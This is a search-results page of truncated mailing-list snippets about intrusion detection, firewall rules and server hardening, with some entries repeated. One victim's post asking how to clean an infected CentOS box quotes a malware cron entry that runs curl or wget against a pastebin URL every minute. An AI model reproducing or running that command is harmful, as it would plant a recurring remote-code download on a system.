search for: intrusive

Hello all, I have been exploring the various intrusion detection systems available for the Linux platform and was wondering what ones you all would recommend? I have used AIDE before and while it is extremely easy to setup, it does not support the ability to send alerts as files are changed (allows one to be aware of an intrusion almost immediately). Thank you, Dan Burkland ?

Can anyone recommend an opensource package (preferably something centos 4X compatible) that can be used on a (iptables) firewall to block virus/trojan, etc? And maybe something for intrusion detection? Thanks! Dnk

Dear all, what are the key strategies for intrusion prevention and detection with dovecot, apart from installing fail2ban? It is a pity that the IMAP protocol does not support 2 factor authentication, which seems to stop 90% of intrusion attempts in their tracks. Without it, if someone has obtained your password and reads your mail without modifying it, you will hardly ever notice. Is there a

Hi, I wrote a mail a few days ago concerning my setup with a front/back firewall, shorewall being front and ISA server 2004 acting as back firewall. I said that ISA server is logging some "intrusion attempts" namely requests coming from external interface to the internal network. As this shouldn''t happen (all intrusion attempts should be stopped by shorewall) I begun to

<div dir='auto'>Usually I use pfsense as main firewall with snort blocking all kind of scans and others.<div dir="auto"><br></div><div dir="auto">Fail2ban triggering after 3 unsuccessful tries and for last iptables if Linux or ipfw If Freebsd</div><div dir="auto"><br></div><div

Hello to all, I have implemented a new type of intrusion detection system for my Master thesis. I would like to announce this information, in case anyone would be interested in this research. The IDS system is designed as a kernel module for FreeBSD 5.2. It is inspired by the SpamAssassin program, which detects spam by applying a set of tests to every email message and counting a sum of

Hello to all, I have implemented a new type of intrusion detection system for my Master thesis. I would like to announce this information, in case anyone would be interested in this research. The IDS system is designed as a kernel module for FreeBSD 5.2. It is inspired by the SpamAssassin program, which detects spam by applying a set of tests to every email message and counting a sum of

I have noticed since commencing posts on this newsgroup, that there has been a significant increase in attempted intrusions, especially port 80. It's a pity that IP addresses are in the NG headers. :) Oygle

On 2020-04-22 5:29 a.m., Johannes Rohr wrote: > Dear all, > > what are the key strategies for intrusion prevention and detection with > dovecot, apart from installing fail2ban? > It is a pity that the IMAP protocol does not support 2 factor > authentication, which seems to stop 90% of intrusion attempts in their > tracks. Without it, if someone has obtained your password and

I'm looking for some beta testers to provide feedback on an Asterisk intrusion detection & prevention program we're releasing soon. As a quick overview, the program provides: - banning based on geographic location of source IP (Continent, country, region, city, etc) - detection and banning based on channels in use by a user - detection and banning based on rate of dialing - detection

Earlier in the day today Red Hat made an announcement [1] that there had been an intrusion into some of their computer systems last week. In the same announcement they mention that some of the packages for OpenSSH on RHEL-4 ( i386 and x86_64 ) as well as RHEL-5 ( x86_64 ) were signed by the intruder. In their announcement they also clarified that they were confident that none of these, potentially

Earlier in the day today Red Hat made an announcement [1] that there had been an intrusion into some of their computer systems last week. In the same announcement they mention that some of the packages for OpenSSH on RHEL-4 ( i386 and x86_64 ) as well as RHEL-5 ( x86_64 ) were signed by the intruder. In their announcement they also clarified that they were confident that none of these, potentially

Situation: We are providing hosting services. I've grown tired of the various kiddie scripts/dictionary attacks on various services. The latest has been against vsftpd, on systems that I can't easily control vs. putting strict limits on ssh. We simply have too many users entering from too many networks many with dynamic IP addresses. Enter.... thinking about LIDS or Log Based

This is some of the messages I get: TCP non-syn/non-ack packet on invalid connection. Packet has been dropped TCP Source Port: http(80) TCP Destination Port: 2595 TCP Message Flags: 0x00000019 The TCP message Flags varies. I''ve seen 0x00000011, 0x00000010, 0x00000018, 0x00000004, 0x00000014 and 0x00000019. Intrusion: Invalid TCP Flags TCP Source Port: 6881 TCP Destination Port: 4307

Hi, Is there a way to find out how the CentOS 7.5 Linux box got infected with malware? Currently i am referring to http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html to carry out the below steps and is done manually. 1)rm -fr /tmp/*timesyncc.service* 2)crontab -e -u apigee delete the cron entry */1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget

hi group , i am working on dahdi_monitor for measuring voice quality , so i want to know that on which data i can tell that this PRI lines are working properly, is there any measurement on basis of that i can make MOS. i am working from last 2-3 days but i only get idea about making .raw file and making .wav file and visulal mode of RX and TX of PRI line. what i want is measurement of voice

D'Arcy Cain <darcy at VybeNetworks.com> writes: > I have a script that checks for things like this and adds them to my > packet filter (pf). Everything seems to work up to a point. The IP > address gets added to my AUTOBLOCK table. The second rule, right after > the friends whitelist, blocks any IP in that table. If I try to ping or > traceroute to it I can't get

D'Arcy Cain <darcy at VybeNetworks.com> writes: > Here is the first four lines from "pfctl -sr": > > pass in quick on bge0 from <FRIENDS> to any flags S/SA keep state > block drop in log quick on bge0 from <ENEMIES> to any > block drop in log quick on bge0 from <AUTOBLOCK> to any > block drop out log quick on bge0 from any to

On 2/04/2020 5:28 AM, Mark Boyce wrote: > On 1 Apr 2020, at 22:14, Greg Troxel <gdt at lexort.com > <mailto:gdt at lexort.com>> wrote: >> >> I think you need to use tcpdump and turn up firewall debugging. > > sngrep is your friend …My bet is UDP vs TCP on firewall rules :-) > > Mark Or the stateful entry still exists when the table entry is updated.

On 2020-04-01 16:28, Mark Boyce wrote: > On 1 Apr 2020, at 22:14, Greg Troxel <gdt at lexort.com > <mailto:gdt at lexort.com>> wrote: >> >> I think you need to use tcpdump and turn up firewall debugging. > > sngrep is your friend …My bet is UDP vs TCP on firewall rules :-) block drop in log quick on bge0 from <AUTOBLOCK> to any block drop out log quick